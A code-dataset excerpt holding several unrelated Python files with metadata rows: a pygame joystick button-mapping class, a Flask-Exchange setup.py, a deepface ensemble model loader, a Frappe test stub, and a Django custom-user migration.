self.set_default_layout()
def event_disconnect(self, event: pygame.event.Event) -> None:
if not self.connected():
return
if event.type in (pygame.CONTROLLERDEVICEREMOVED, pygame.JOYDEVICEREMOVED) and event.instance_id == self.id:
self.__joystick.quit()
self.__joystick = None
"""------------------------------------------------------------------"""
def set_default_layout(self) -> None:
layout = {
"A": ("button", 0, 1),
"B": ("button", 1, 1),
"X": ("button", 2, 1),
"Y": ("button", 3, 1),
"L1": ("button", 4, 1),
"R1": ("button", 5, 1),
"SELECT": ("button", 6, 1),
"START": ("button", 7, 1),
"L3": ("button", 8, 1),
"R3": ("button", 9, 1),
"HOME": ("button", 10, 1),
"UP": ("hat", 0, (0, 1)),
"DOWN": ("hat", 0, (0, -1)),
"LEFT": ("hat", 0, (-1, 0)),
"RIGHT": ("hat", 0, (1, 0)),
"L2": ("axis", 2, 1),
"R2": ("axis", 5, 1),
"AXIS_LEFT_X": ("axis", 0, 0),
"AXIS_LEFT_Y": ("axis", 1, 0),
"AXIS_RIGHT_X": ("axis", 3, 0),
"AXIS_RIGHT_Y": ("axis", 4, 0),
}
for key, value in layout.items():
self.__event_type[key] = list(value)
def __save_to_file(self) -> None:
self.__save[self.guid] = dict(self.__event_type)
with open(self.__save_file, "wb") as save:
pickle.dump(self.__save, save)
"""------------------------------------------------------------------"""
@property
def button_list(self) -> list[str]:
return self.__button_list
@property
def axis_list(self) -> list[str]:
return self.__axis_list
@property
def dpad_list(self) -> list[str]:
return self.__dpad_list
"""------------------------------------------------------------------"""
def __test(self, key: str) -> tuple[str, str]:
key = key.upper()
if key.endswith(("-", "+")):
key, suffix = key[:-1], key[-1]
else:
suffix = str()
if key not in self.__event_type:
raise NameError("{} isn't recognized".format(key))
return key, suffix
def get_value(self, key: str) -> float:
key, suffix = self.__test(key)
if not self.connected():
return 0
event, index, active_state = self.__event_type[key]
active_state = {"": active_state, "-": -1, "+": 1}[suffix]
actions = {
"button": self.__joystick.get_button,
"axis": self.__joystick.get_axis,
"hat": self.__joystick.get_hat,
}
try:
state = actions[event](index)
except pygame.error:
return 0
if event == "button":
return state
if event == "hat" and isinstance(state, tuple):
return 1 if all(active_state[i] == 0 or state[i] == active_state[i] for i in range(2)) else 0
if event == "axis":
if key not in self.axis_list and self.__button_axis_return_bool:
return 1 if state >= 0.9 else 0
return self.__get_axis_value(state, active_state)
return 0
def __get_axis_value(self, state: float, active_state: int) -> float:
if active_state != 0:
if (active_state > 0 and state < 0) or (active_state < 0 and state > 0):
return 0
return abs(state)
return state
def search_key(self, event_type: str, index: int, hat_value: Optional[tuple[int, int]] = None, axis: Optional[int] = None) -> Union[str, None]:
for key, (event, idx, value) in self.__event_type.items():
if event == event_type and idx == index and (event != "hat" or value == hat_value) and (event != "axis" or axis is None or value == axis):
return key
return None
def __getitem__(self, key: str) -> Union[int, float]:
key = self.__test(key)[0]
infos = self.__event_type[key]
return infos[1]
def __setitem__(self, key: str, value: tuple[int, int, tuple[int, int]]) -> None:
self.set_event(key, *value)
def set_event(self, key: str, event: int, index: int, hat_value: Optional[tuple[int, int]] = (0, 0)) -> None:
key = self.__test(key)[0]
event_map = {
pygame.JOYBUTTONDOWN: ("button", index, 1),
pygame.JOYAXISMOTION: ("axis", index, 0 if key not in self.button_list + self.dpad_list else 1),
pygame.JOYHATMOTION: ("hat", index, hat_value)
}
if event in event_map:
self.__event_type[key] = list(event_map[event])
self.__save_to_file()
def set_button_axis(self, state: bool) -> None:
self.__button_axis_return_bool = bool(state)
def get_button_axis_state(self) -> bool:
return self.__button_axis_return_bool
"""------------------------------------------------------------------"""
@property
def device_index(self) -> int:
return self.__index
@property
def id(self) -> int:
return self.__joystick.get_instance_id() if self.connected() else -1
@property
def guid(self) -> str:
return self.__joystick.get_guid() if self.connected() else str()
@property
def name(self) -> str:
return self.__joystick.get_name() if self.connected() else str()
@property
def power_level(self) -> str:
return self.__joystick.get_power_level() if self.connected() else "unknown"
"""------------------------------------------------------------------"""
@staticmethod
def count() -> int:
return pygame.joystick.get_count()
@staticmethod
def list() -> tuple[str, ...]:
try:
joystick = tuple(pygame.joystick.Joystick(i).get_name() for i in range(Joystick.count()))
except pygame.error:
joystick = tuple()
return joystick
"""------------------------------------------------------------------"""
A = property(lambda self: self.__getitem__("A"), lambda self, value: self.set_event("A", *value))
B = property(lambda self: self.__getitem__("B"), lambda self, value: self.set_event("B", *value))
X = property(lambda self: self.__getitem__("X"), lambda self, value: self.set_event("X", *value))
Y = property(lambda self: self.__getitem__("Y"), lambda self, value: self.set_event("Y", *value))
L1 = property(lambda self: self.__getitem__("L1"), lambda self, value: self.set_event("L1", *value))
L2 = property(lambda self: self.__getitem__("L2"), lambda self, value: self.set_event("L2", *value))
L3 = property(lambda self: self.__getitem__("L3"), lambda self, value: self.set_event("L3", *value))
R1 = property(lambda self: self.__getitem__("R1"), lambda self, value: self.set_event("R1", *value))
R2 = property(lambda self: self.__getitem__("R2"), lambda self, value: self.set_event("R2", *value))
R3 = property(lambda self: self.__getitem__("R3"), lambda self, value: self.set_event("R3", *value))
SELECT = property(lambda self: self.__getitem__("SELECT"), lambda self, value: self.set_event("SELECT", *value))
START = property(lambda self: self.__getitem__("START"), lambda self, value: self.set_event("START", *value))
UP = property(lambda self: self.__getitem__("UP"), lambda self, value: self.set_event("UP", *value))
DOWN = property(lambda self: self.__getitem__("DOWN"), lambda self, value: self.set_event("DOWN", *value))
LEFT = property(lambda self: self.__getitem__("LEFT"), lambda self, value: self.set_event("LEFT", *value))
RIGHT = property(lambda self: self.__getitem__("RIGHT"), lambda self, value: self.set_event("RIGHT", *value))
AXIS_LEFT_X = property(lambda self: self.__getitem__("AXIS_LEFT_X"), lambda self, value: self.set_event("AXIS_LEFT_X", *value))
AXIS_LEFT_Y = property(lambda self: self.__getitem__("AXIS_LEFT_Y"), lambda self, value: self.set_event("AXIS_LEFT_Y", *value))
AXIS_RIGHT_X = property(lambda self: self.__getitem__("AXIS_RIGHT_X"), lambda self, value: self.set_event("AXIS_RIGHT_X", *value))
AXIS_RIGHT_Y = property(lambda self: self.__getitem__("AXIS_RIGHT_Y"), lambda self, value: self.set_event("AXIS_RIGHT_Y", *value))
class JoystickList(object):
__slots__ = ("__list",)
def __init__(self):
self.__list = list()
def set(self, nb_joystick: int) -> None:
self.__list = [Joystick(i) for i in range(nb_joystick)]
def __iter__(self) -> Iterator[Joystick]:
return iter(self.__list)
def __bool__(self) -> bool:
return bool(self.__list)
def __getitem__(self, index: int) -> Union[Joystick, None]:
return self.get_joy_by_device_index(index)
def get_joy_by_device_index(self, index: int) -> Union[Joystick, None]:
for joy in self:
if joy.device_index == index:
return joy
return None
def get_joy_by_instance_id(self, instance_id: int) -> Union[Joystick, None]:
for joy in self:
if joy.id == instance_id:
return joy
return None
def event_connect(self, event: pygame.event.Event) -> None:
if event.type in (pygame.CONTROLLERDEVICEADDED, pygame.JOYDEVICEADDED):
joystick = self.get_joy_by_device_index(event.device_index)
if joystick is not None:
joystick.event_connect(event)
def event_disconnect(self, event: pygame.event.Event) -> None:
if event.type in (pygame.CONTROLLERDEVICEREMOVED, pygame.JOYDEVICEREMOVED):
joystick = self.get_joy_by_instance_id(event.instance_id)
if joystick is not None:
joystick.event_disconnect(event)
| 42.173913
| 150
| 0.564089
|
import os
import sys
from typing import Union, Optional, Iterator
import pickle
import pygame
class Joystick:
def __init__(self, index: int):
self.__index = index
self.__joystick = pygame.joystick.Joystick(index) if index in range(Joystick.count()) else None
self.__button_list = ["A", "B", "X", "Y", "L1", "L2", "R1", "R2", "SELECT", "START", "L3", "R3", "HOME"]
self.__axis_list = ["AXIS_LEFT_X", "AXIS_LEFT_Y", "AXIS_RIGHT_X", "AXIS_RIGHT_Y"]
self.__dpad_list = ["UP", "DOWN", "LEFT", "RIGHT"]
self.__event_type = {key: [str(), -1, 0] for key in self.button_list + self.axis_list + self.dpad_list}
self.__save_file = os.path.join(sys.path[0], "joystick.bin")
if os.path.isfile(self.__save_file):
with open(self.__save_file, "rb") as save:
self.__save = pickle.load(save)
else:
self.__save = dict()
self.set_default_layout()
self.__button_axis_return_bool = False
def connected(self) -> bool:
return bool(self.__joystick is not None)
def event_connect(self, event: pygame.event.Event) -> None:
if self.connected():
return
if event.type in (pygame.CONTROLLERDEVICEADDED, pygame.JOYDEVICEADDED) and event.device_index == self.__index:
self.__joystick = pygame.joystick.Joystick(event.device_index)
if self.guid in self.__save:
self.__event_type = self.__save[self.guid]
else:
self.set_default_layout()
def event_disconnect(self, event: pygame.event.Event) -> None:
if not self.connected():
return
if event.type in (pygame.CONTROLLERDEVICEREMOVED, pygame.JOYDEVICEREMOVED) and event.instance_id == self.id:
self.__joystick.quit()
self.__joystick = None
def set_default_layout(self) -> None:
layout = {
"A": ("button", 0, 1),
"B": ("button", 1, 1),
"X": ("button", 2, 1),
"Y": ("button", 3, 1),
"L1": ("button", 4, 1),
"R1": ("button", 5, 1),
"SELECT": ("button", 6, 1),
"START": ("button", 7, 1),
"L3": ("button", 8, 1),
"R3": ("button", 9, 1),
"HOME": ("button", 10, 1),
"UP": ("hat", 0, (0, 1)),
"DOWN": ("hat", 0, (0, -1)),
"LEFT": ("hat", 0, (-1, 0)),
"RIGHT": ("hat", 0, (1, 0)),
"L2": ("axis", 2, 1),
"R2": ("axis", 5, 1),
"AXIS_LEFT_X": ("axis", 0, 0),
"AXIS_LEFT_Y": ("axis", 1, 0),
"AXIS_RIGHT_X": ("axis", 3, 0),
"AXIS_RIGHT_Y": ("axis", 4, 0),
}
for key, value in layout.items():
self.__event_type[key] = list(value)
def __save_to_file(self) -> None:
self.__save[self.guid] = dict(self.__event_type)
with open(self.__save_file, "wb") as save:
pickle.dump(self.__save, save)
@property
def button_list(self) -> list[str]:
return self.__button_list
@property
def axis_list(self) -> list[str]:
return self.__axis_list
@property
def dpad_list(self) -> list[str]:
return self.__dpad_list
def __test(self, key: str) -> tuple[str, str]:
key = key.upper()
if key.endswith(("-", "+")):
key, suffix = key[:-1], key[-1]
else:
suffix = str()
if key not in self.__event_type:
raise NameError("{} isn't recognized".format(key))
return key, suffix
def get_value(self, key: str) -> float:
key, suffix = self.__test(key)
if not self.connected():
return 0
event, index, active_state = self.__event_type[key]
active_state = {"": active_state, "-": -1, "+": 1}[suffix]
actions = {
"button": self.__joystick.get_button,
"axis": self.__joystick.get_axis,
"hat": self.__joystick.get_hat,
}
try:
state = actions[event](index)
except pygame.error:
return 0
if event == "button":
return state
if event == "hat" and isinstance(state, tuple):
return 1 if all(active_state[i] == 0 or state[i] == active_state[i] for i in range(2)) else 0
if event == "axis":
if key not in self.axis_list and self.__button_axis_return_bool:
return 1 if state >= 0.9 else 0
return self.__get_axis_value(state, active_state)
return 0
def __get_axis_value(self, state: float, active_state: int) -> float:
if active_state != 0:
if (active_state > 0 and state < 0) or (active_state < 0 and state > 0):
return 0
return abs(state)
return state
def search_key(self, event_type: str, index: int, hat_value: Optional[tuple[int, int]] = None, axis: Optional[int] = None) -> Union[str, None]:
for key, (event, idx, value) in self.__event_type.items():
if event == event_type and idx == index and (event != "hat" or value == hat_value) and (event != "axis" or axis is None or value == axis):
return key
return None
def __getitem__(self, key: str) -> Union[int, float]:
key = self.__test(key)[0]
infos = self.__event_type[key]
return infos[1]
def __setitem__(self, key: str, value: tuple[int, int, tuple[int, int]]) -> None:
self.set_event(key, *value)
def set_event(self, key: str, event: int, index: int, hat_value: Optional[tuple[int, int]] = (0, 0)) -> None:
key = self.__test(key)[0]
event_map = {
pygame.JOYBUTTONDOWN: ("button", index, 1),
pygame.JOYAXISMOTION: ("axis", index, 0 if key not in self.button_list + self.dpad_list else 1),
pygame.JOYHATMOTION: ("hat", index, hat_value)
}
if event in event_map:
self.__event_type[key] = list(event_map[event])
self.__save_to_file()
def set_button_axis(self, state: bool) -> None:
self.__button_axis_return_bool = bool(state)
def get_button_axis_state(self) -> bool:
return self.__button_axis_return_bool
@property
def device_index(self) -> int:
return self.__index
@property
def id(self) -> int:
return self.__joystick.get_instance_id() if self.connected() else -1
@property
def guid(self) -> str:
return self.__joystick.get_guid() if self.connected() else str()
@property
def name(self) -> str:
return self.__joystick.get_name() if self.connected() else str()
@property
def power_level(self) -> str:
return self.__joystick.get_power_level() if self.connected() else "unknown"
@staticmethod
def count() -> int:
return pygame.joystick.get_count()
@staticmethod
def list() -> tuple[str, ...]:
try:
joystick = tuple(pygame.joystick.Joystick(i).get_name() for i in range(Joystick.count()))
except pygame.error:
joystick = tuple()
return joystick
A = property(lambda self: self.__getitem__("A"), lambda self, value: self.set_event("A", *value))
B = property(lambda self: self.__getitem__("B"), lambda self, value: self.set_event("B", *value))
X = property(lambda self: self.__getitem__("X"), lambda self, value: self.set_event("X", *value))
Y = property(lambda self: self.__getitem__("Y"), lambda self, value: self.set_event("Y", *value))
L1 = property(lambda self: self.__getitem__("L1"), lambda self, value: self.set_event("L1", *value))
L2 = property(lambda self: self.__getitem__("L2"), lambda self, value: self.set_event("L2", *value))
L3 = property(lambda self: self.__getitem__("L3"), lambda self, value: self.set_event("L3", *value))
R1 = property(lambda self: self.__getitem__("R1"), lambda self, value: self.set_event("R1", *value))
R2 = property(lambda self: self.__getitem__("R2"), lambda self, value: self.set_event("R2", *value))
R3 = property(lambda self: self.__getitem__("R3"), lambda self, value: self.set_event("R3", *value))
SELECT = property(lambda self: self.__getitem__("SELECT"), lambda self, value: self.set_event("SELECT", *value))
START = property(lambda self: self.__getitem__("START"), lambda self, value: self.set_event("START", *value))
UP = property(lambda self: self.__getitem__("UP"), lambda self, value: self.set_event("UP", *value))
DOWN = property(lambda self: self.__getitem__("DOWN"), lambda self, value: self.set_event("DOWN", *value))
LEFT = property(lambda self: self.__getitem__("LEFT"), lambda self, value: self.set_event("LEFT", *value))
RIGHT = property(lambda self: self.__getitem__("RIGHT"), lambda self, value: self.set_event("RIGHT", *value))
AXIS_LEFT_X = property(lambda self: self.__getitem__("AXIS_LEFT_X"), lambda self, value: self.set_event("AXIS_LEFT_X", *value))
AXIS_LEFT_Y = property(lambda self: self.__getitem__("AXIS_LEFT_Y"), lambda self, value: self.set_event("AXIS_LEFT_Y", *value))
AXIS_RIGHT_X = property(lambda self: self.__getitem__("AXIS_RIGHT_X"), lambda self, value: self.set_event("AXIS_RIGHT_X", *value))
AXIS_RIGHT_Y = property(lambda self: self.__getitem__("AXIS_RIGHT_Y"), lambda self, value: self.set_event("AXIS_RIGHT_Y", *value))
class JoystickList(object):
__slots__ = ("__list",)
def __init__(self):
self.__list = list()
def set(self, nb_joystick: int) -> None:
self.__list = [Joystick(i) for i in range(nb_joystick)]
def __iter__(self) -> Iterator[Joystick]:
return iter(self.__list)
def __bool__(self) -> bool:
return bool(self.__list)
def __getitem__(self, index: int) -> Union[Joystick, None]:
return self.get_joy_by_device_index(index)
def get_joy_by_device_index(self, index: int) -> Union[Joystick, None]:
for joy in self:
if joy.device_index == index:
return joy
return None
def get_joy_by_instance_id(self, instance_id: int) -> Union[Joystick, None]:
for joy in self:
if joy.id == instance_id:
return joy
return None
def event_connect(self, event: pygame.event.Event) -> None:
if event.type in (pygame.CONTROLLERDEVICEADDED, pygame.JOYDEVICEADDED):
joystick = self.get_joy_by_device_index(event.device_index)
if joystick is not None:
joystick.event_connect(event)
def event_disconnect(self, event: pygame.event.Event) -> None:
if event.type in (pygame.CONTROLLERDEVICEREMOVED, pygame.JOYDEVICEREMOVED):
joystick = self.get_joy_by_instance_id(event.instance_id)
if joystick is not None:
joystick.event_disconnect(event)
| true
| true
|
1c421365662f9c384e027d6403a99b7bfe2c0777
| 152
|
py
|
Python
|
slnee_quality/slnee_quality/doctype/request/test_request.py
|
erpcloudsystems/slnee_quality
|
ad81f029a795ee073768c7c933cd91e61b6df059
|
[
"MIT"
] | null | null | null |
slnee_quality/slnee_quality/doctype/request/test_request.py
|
erpcloudsystems/slnee_quality
|
ad81f029a795ee073768c7c933cd91e61b6df059
|
[
"MIT"
] | null | null | null |
slnee_quality/slnee_quality/doctype/request/test_request.py
|
erpcloudsystems/slnee_quality
|
ad81f029a795ee073768c7c933cd91e61b6df059
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021, erpcloud.systems and Contributors
# See license.txt
# import frappe
import unittest
class TestRequest(unittest.TestCase):
pass
| 16.888889
| 55
| 0.782895
|
import unittest
class TestRequest(unittest.TestCase):
pass
| true
| true
|
1c42146f0e6735ced4e1a4fbe2550582ad5298af
| 4,187
|
py
|
Python
|
setup.py
|
jscurtu/flask-exchange
|
a2dddb3e03c14c488a90ee63df4858d832d4e841
|
[
"MIT"
] | null | null | null |
setup.py
|
jscurtu/flask-exchange
|
a2dddb3e03c14c488a90ee63df4858d832d4e841
|
[
"MIT"
] | null | null | null |
setup.py
|
jscurtu/flask-exchange
|
a2dddb3e03c14c488a90ee63df4858d832d4e841
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Note: To use the 'upload' functionality of this file, you must:
# $ pip install twine
import io
import os
import sys
from shutil import rmtree
from setuptools import find_packages, setup, Command
# Package meta-data.
NAME = 'Flask-Exchange'
DESCRIPTION = 'Exchange support for Flask using ExchangeLib.'
URL = 'https://github.com/jscurtu/flask-exchange'
EMAIL = 'jscurtu@gmail.com'
AUTHOR = 'Jason Scurtu'
REQUIRES_PYTHON = '>=3.6.0'
VERSION = '0.0.2'
# What packages are required for this module to be executed?
REQUIRED = [
'flask>=0.10.1', 'exchangelib>=1.12.0', 'urllib3'
]
# What packages are optional?
EXTRAS = {
# 'fancy feature': ['django'],
}
# The rest you shouldn't have to touch too much :)
# ------------------------------------------------
# Except, perhaps the License and Trove Classifiers!
# If you do change the License, remember to change the Trove Classifier for that!
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
except FileNotFoundError:
long_description = DESCRIPTION
# Load the package's __version__.py module as a dictionary.
about = {}
if not VERSION:
with open(os.path.join(here, NAME, '__version__.py')) as f:
exec(f.read(), about)
else:
about['__version__'] = VERSION
class UploadCommand(Command):
"""Support setup.py upload."""
description = 'Build and publish the package.'
user_options = []
@staticmethod
def status(s):
"""Prints things in bold."""
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to PyPI via Twine…')
os.system('twine upload dist/*')
self.status('Pushing git tags…')
os.system('git tag v{0}'.format(about['__version__']))
os.system('git push --tags')
sys.exit()
# Where the magic happens:
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests', 'examples')),
# If your package is a single module, use this instead of 'packages':
# py_modules=['mypackage'],
# entry_points={
# 'console_scripts': ['mycli=mymodule:cli'],
# },
install_requires=REQUIRED,
extras_require=EXTRAS,
include_package_data=True,
license='MIT',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'Framework :: Flask',
'Topic :: Office/Business :: Groupware',
'License :: OSI Approved :: MIT License',
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
# $ setup.py publish support.
cmdclass={
'upload': UploadCommand,
},
)
| 29.695035
| 86
| 0.633389
|
import io
import os
import sys
from shutil import rmtree
from setuptools import find_packages, setup, Command
NAME = 'Flask-Exchange'
DESCRIPTION = 'Exchange support for Flask using ExchangeLib.'
URL = 'https://github.com/jscurtu/flask-exchange'
EMAIL = 'jscurtu@gmail.com'
AUTHOR = 'Jason Scurtu'
REQUIRES_PYTHON = '>=3.6.0'
VERSION = '0.0.2'
REQUIRED = [
'flask>=0.10.1', 'exchangelib>=1.12.0', 'urllib3'
]
EXTRAS = {
}
# ------------------------------------------------
# Except, perhaps the License and Trove Classifiers!
# If you do change the License, remember to change the Trove Classifier for that!
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
except FileNotFoundError:
long_description = DESCRIPTION
# Load the package's __version__.py module as a dictionary.
about = {}
if not VERSION:
with open(os.path.join(here, NAME, '__version__.py')) as f:
exec(f.read(), about)
else:
about['__version__'] = VERSION
class UploadCommand(Command):
description = 'Build and publish the package.'
user_options = []
@staticmethod
def status(s):
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to PyPI via Twine…')
os.system('twine upload dist/*')
self.status('Pushing git tags…')
os.system('git tag v{0}'.format(about['__version__']))
os.system('git push --tags')
sys.exit()
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests', 'examples')),
install_requires=REQUIRED,
extras_require=EXTRAS,
include_package_data=True,
license='MIT',
classifiers=[
'Framework :: Flask',
'Topic :: Office/Business :: Groupware',
'License :: OSI Approved :: MIT License',
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
cmdclass={
'upload': UploadCommand,
},
)
| true
| true
|
1c4214d2e36cfc42beb2859a091fcdd9139c8678
| 2,019
|
py
|
Python
|
deepface/basemodels/Boosting.py
|
olive380/deepface
|
630e8e72f591eee63c724cb8cbcbbc66712f93fc
|
[
"MIT"
] | 2
|
2021-03-24T07:06:56.000Z
|
2021-04-09T15:08:13.000Z
|
deepface/basemodels/Boosting.py
|
olive380/deepface
|
630e8e72f591eee63c724cb8cbcbbc66712f93fc
|
[
"MIT"
] | null | null | null |
deepface/basemodels/Boosting.py
|
olive380/deepface
|
630e8e72f591eee63c724cb8cbcbbc66712f93fc
|
[
"MIT"
] | 2
|
2021-04-09T15:09:27.000Z
|
2021-08-06T17:57:03.000Z
|
from deepface import DeepFace
from tqdm import tqdm
import os
from os import path
from pathlib import Path
import numpy as np
import gdown
from deepface.commons import functions, distance as dst
def loadModel():
model_names = ['VGG-Face', 'Facenet', 'OpenFace', 'DeepFace']
model = {}
model_pbar = tqdm(range(0, 4), desc='Face recognition models')
for index in model_pbar:
model_name = model_names[index]
model_pbar.set_description("Loading %s" % (model_name))
model[model_name] = DeepFace.build_model(model_name)
return model
def validate_model(model):
#validate model dictionary because it might be passed from input as pre-trained
found_models = []
for key, value in model.items():
found_models.append(key)
if ('VGG-Face' in found_models) and ('Facenet' in found_models) and ('OpenFace' in found_models) and ('DeepFace' in found_models):
#print("Ensemble learning will be applied for ", found_models," models")
valid = True
else:
missing_ones = set(['VGG-Face', 'Facenet', 'OpenFace', 'DeepFace']) - set(found_models)
raise ValueError("You'd like to apply ensemble method and pass pre-built models but models must contain [VGG-Face, Facenet, OpenFace, DeepFace] but you passed "+str(found_models)+". So, you need to pass "+str(missing_ones)+" models as well.")
def build_gbm():
#this is not a must dependency
import lightgbm as lgb #lightgbm==2.3.1
home = str(Path.home())
if os.path.isfile(home+'/.deepface/weights/face-recognition-ensemble-model.txt') != True:
print("face-recognition-ensemble-model.txt will be downloaded...")
url = 'https://raw.githubusercontent.com/serengil/deepface/master/deepface/models/face-recognition-ensemble-model.txt'
output = home+'/.deepface/weights/face-recognition-ensemble-model.txt'
gdown.download(url, output, quiet=False)
ensemble_model_path = home+'/.deepface/weights/face-recognition-ensemble-model.txt'
deepface_ensemble = lgb.Booster(model_file = ensemble_model_path)
return deepface_ensemble
| 33.65
| 244
| 0.741951
|
from deepface import DeepFace
from tqdm import tqdm
import os
from os import path
from pathlib import Path
import numpy as np
import gdown
from deepface.commons import functions, distance as dst
def loadModel():
model_names = ['VGG-Face', 'Facenet', 'OpenFace', 'DeepFace']
model = {}
model_pbar = tqdm(range(0, 4), desc='Face recognition models')
for index in model_pbar:
model_name = model_names[index]
model_pbar.set_description("Loading %s" % (model_name))
model[model_name] = DeepFace.build_model(model_name)
return model
def validate_model(model):
found_models = []
for key, value in model.items():
found_models.append(key)
if ('VGG-Face' in found_models) and ('Facenet' in found_models) and ('OpenFace' in found_models) and ('DeepFace' in found_models):
valid = True
else:
missing_ones = set(['VGG-Face', 'Facenet', 'OpenFace', 'DeepFace']) - set(found_models)
raise ValueError("You'd like to apply ensemble method and pass pre-built models but models must contain [VGG-Face, Facenet, OpenFace, DeepFace] but you passed "+str(found_models)+". So, you need to pass "+str(missing_ones)+" models as well.")
def build_gbm():
#this is not a must dependency
import lightgbm as lgb #lightgbm==2.3.1
home = str(Path.home())
if os.path.isfile(home+'/.deepface/weights/face-recognition-ensemble-model.txt') != True:
print("face-recognition-ensemble-model.txt will be downloaded...")
url = 'https://raw.githubusercontent.com/serengil/deepface/master/deepface/models/face-recognition-ensemble-model.txt'
output = home+'/.deepface/weights/face-recognition-ensemble-model.txt'
gdown.download(url, output, quiet=False)
ensemble_model_path = home+'/.deepface/weights/face-recognition-ensemble-model.txt'
deepface_ensemble = lgb.Booster(model_file = ensemble_model_path)
return deepface_ensemble
| true
| true
|
1c4214ef8c07af7c6afe258f74e0b3e443f397d4
| 2,278
|
py
|
Python
|
accounts/migrations/0001_initial.py
|
bilesanmiahmad/weight-tracker
|
6badd70d0b1005fb96ec354dece3e2e5f3f016e3
|
[
"MIT"
] | null | null | null |
accounts/migrations/0001_initial.py
|
bilesanmiahmad/weight-tracker
|
6badd70d0b1005fb96ec354dece3e2e5f3f016e3
|
[
"MIT"
] | null | null | null |
accounts/migrations/0001_initial.py
|
bilesanmiahmad/weight-tracker
|
6badd70d0b1005fb96ec354dece3e2e5f3f016e3
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.6 on 2018-06-18 10:33
import accounts.models
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True, verbose_name='email address')),
('first_name', models.CharField(max_length=70, verbose_name='first name')),
('last_name', models.CharField(max_length=70, verbose_name='last name')),
('avatar', models.ImageField(blank=True, null=True, upload_to='users/avatars/')),
('date_joined', models.DateTimeField(auto_now_add=True, verbose_name='date joined')),
('is_active', models.BooleanField(default=True, verbose_name='active')),
('is_staff', models.BooleanField(default=False, verbose_name='staff')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
},
managers=[
('objects', accounts.models.NewManager()),
],
),
]
| 54.238095
| 266
| 0.634767
|
import accounts.models
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True, verbose_name='email address')),
('first_name', models.CharField(max_length=70, verbose_name='first name')),
('last_name', models.CharField(max_length=70, verbose_name='last name')),
('avatar', models.ImageField(blank=True, null=True, upload_to='users/avatars/')),
('date_joined', models.DateTimeField(auto_now_add=True, verbose_name='date joined')),
('is_active', models.BooleanField(default=True, verbose_name='active')),
('is_staff', models.BooleanField(default=False, verbose_name='staff')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
